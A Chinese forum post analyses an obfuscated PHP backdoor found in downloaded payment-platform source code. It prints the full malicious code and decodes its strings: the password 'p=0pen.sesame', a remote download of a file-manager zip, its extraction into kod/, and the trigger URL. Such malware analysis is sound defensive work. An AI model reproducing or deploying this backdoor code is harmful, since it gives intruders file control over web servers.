社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
  • 7257阅读
  • 2回复

[分享]混个脸熟,简单分析一个PHP小马

楼层直达
z3960 
级别: 茶馆馆主
发帖
770868
飞翔币
207694
威望
215657
飞扬币
2511641
信誉值
8

前些天在网上下载了一个支付平台的源码发现里面有个kissme.php文件报毒提取出来的代码如下图:懒得手动梳理。直接扔一个在线美化网站格式化一下,得到代码

[PHP] 纯文本查看 复制代码

?[tr=none]
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
<?phpif (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG");$GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747"); if (!defined(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]))) define(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]) , ord(1));if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG");$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B"); if (!defined(pack($GLOBALS[AAAGGAA] {    0}, $GLOBALS[AAAGGAA] {    01}))) define(pack($GLOBALS[AAAGGAA] {    0}, $GLOBALS[AAAGGAA] {    01}) , pack($GLOBALS[AAAGGAA] {    0}, $GLOBALS[AAAGGAA][02]));$GLOBALS[AAGAGGA] = explode(pack($GLOBALS[AAAGGAA] {    0}, $GLOBALS[AAAGGAA] {    3}) , pack($GLOBALS[AAAGGAA] {    0}, $GLOBALS[AAAGGAA][0x4]));if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG");$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A"); if (!$GLOBALS[AAGAGGA] {    0x1}(pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    1}))) call_user_func(pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA][02]) , pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    1}) , pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    03}));$GLOBALS[AAGGAAG] = array(    $_GET);$AGAAAAG = & $passwd;$AGAAAAA = & $ch;$AAGGGGG = & $source;$AAGGGGA = & $data;$AAGGGAG = & $destination;$file = & $AAGGGAA;$AAGGAGG = & $zip;$file_path = & $AAGGAGA;$AGAAAAG = isset($GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG) ][pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    4}) ]) ? $GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG) ][pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    4}) ] : pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA][05]);if ($AGAAAAG != pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA][06])) {    exit;}$AGAAAAA = curl_init();$AAGGGGG = pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    07});curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG);curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008));$AAGGGGA = curl_exec($AGAAAAA);curl_close($AGAAAAA);$AAGGGAG = pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    0x8});$AAGGGAA = $GLOBALS[AAGAGGA] {    02}($AAGGGAG, pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA][011]));$GLOBALS[AAGAGGA] {    03}($AAGGGAA, $AAGGGGA);$GLOBALS[AAGAGGA] {    0x4}($AAGGGAA);$AAGGAGG = new ZipArchive();if ($AAGGAGG->open(pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA][012])) === true) {    $AAGGAGG->extractTo(pack($GLOBALS[AAAGGGA] {        0x0    }    , $GLOBALS[AAAGGGA] {        11    }));    $AAGGAGG->close();}$AAGGAGA = pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    0x8});if ($GLOBALS[AAGAGGA] {    05}($AAGGAGA)) {    if ($GLOBALS[AAGAGGA][6]($AAGGAGA)) {    }}echo pack($GLOBALS[AAAGGGA] {    0x0}, $GLOBALS[AAAGGGA] {    0xC});?>现在看着顺眼一点,开始一步步分析我们直接看比较长的字符串,看第七行代码:

[PHP] 纯文本查看 复制代码

?[tr=none]
1
$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");explode函数作用为以第一个参数文本分割第二个参数文本为数组我们可以加个print_r函数将$GLOBALS[AAAGGAA] 数组输出看看结果:

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
4
5
6
7
8
Array(    [0] => H*    [1] => 41414741474741    [2] => 41414741474147    [3] => 7C3A7C2D7C35    [4] => 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B)上方数组再用   echo pack("H*","41414741474741");  方法调试输出一下(第一个参数为上方数组的[0],第二个参数为上方数组中的[1],[2],[3],[4]),分别得到如下内容:

[PHP] 纯文本查看 复制代码

?[tr=none]
01
02
03
04
05
06
07
08
09
10
11
12
13
14
    [1] =>AAGAGGA    [2] =>AAGAGAG    [3] =>|:|-|5    [4] =>|:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink//其中, [3]和[4]的类型等同于上方代码,再进行字符打散为数组得出:(    [0] =>    [1] => defined    [2] => fopen    [3] => fputs    [4] => fclose    [5] => is_file    [6] => unlink)至此,相关声明部分已基本完成-----------------------------------------------------------------分割线-------------------------------------------------------------然后我们继续,来到第33行:

[PHP] 纯文本查看 复制代码

?[tr=none]
1
$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");用相同的方法,得到数组内容:

[PHP] 纯文本查看 复制代码

?[tr=none]
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
Array(    [0] => H*    [1] => 41414747414147    [2] => 646566696E65    [3] => 41414747414141    [4] => 70    [5] =>    [6] => 3070656e2e736573616d65    [7] => 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970    [8] => 2E2F6B6F642E7A6970    [9] => 772B    [10] => 6B6F642E7A6970    [11] => 6B6F642F    [12] => 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A)//再通过pack函数依次进行解码得到如下信息:    [1] =>AAGGAAG    [2] =>define    [3] =>AAGGAAA    [4] =>p    [5] =>    [6] =>0pen.sesame    [7] =>http://static.kodcloud.com/update/download/kodexplorer4.40.zip    [8] =>./kod.zip    [9] =>w+    [10] =>kod.zip    [11] =>kod/    [12] =><a href="./kod" target="_blank">执行成功点击进入</a>到这里,基本已梳理出小马相关信息了小马作者利用的是可道云的文件管理信息上面解码出来的[4]为小马连接密码的参数名,[6]为小马连接密码(芝麻开门??)当传入密码参数后,服务器将会进行可道云文件管理的zip包,并进行解压,解压目录位于小马目录的kod文件夹然后返回一个链接,直接点击即可进入文件管理器小马验证:将kissme.php放入目录,直接访问:http://127.0.0.1/kissme.php?p=0pen.sesame片刻后,输出链接,点击后进入可道云资源管理器……
我不喜欢说话却每天说最多的话,我不喜欢笑却总笑个不停,身边的每个人都说我的生活好快乐,于是我也就认为自己真的快乐。可是为什么我会在一大群朋友中突然地就沉默,为什么在人群中看到个相似的背影就难过,看见秋天树木疯狂地掉叶子我就忘记了说话,看见天色渐晚路上暖黄色的灯火就忘记了自己原来的方向。
级别: 超级版主
发帖
830658
飞翔币
224558
威望
224618
飞扬币
2423786
信誉值
0

只看该作者 1 发表于: 2022-01-25
来看一下
级别: 超级版主
发帖
830658
飞翔币
224558
威望
224618
飞扬币
2423786
信誉值
0

只看该作者 2 发表于: 2022-01-25
不错,了解了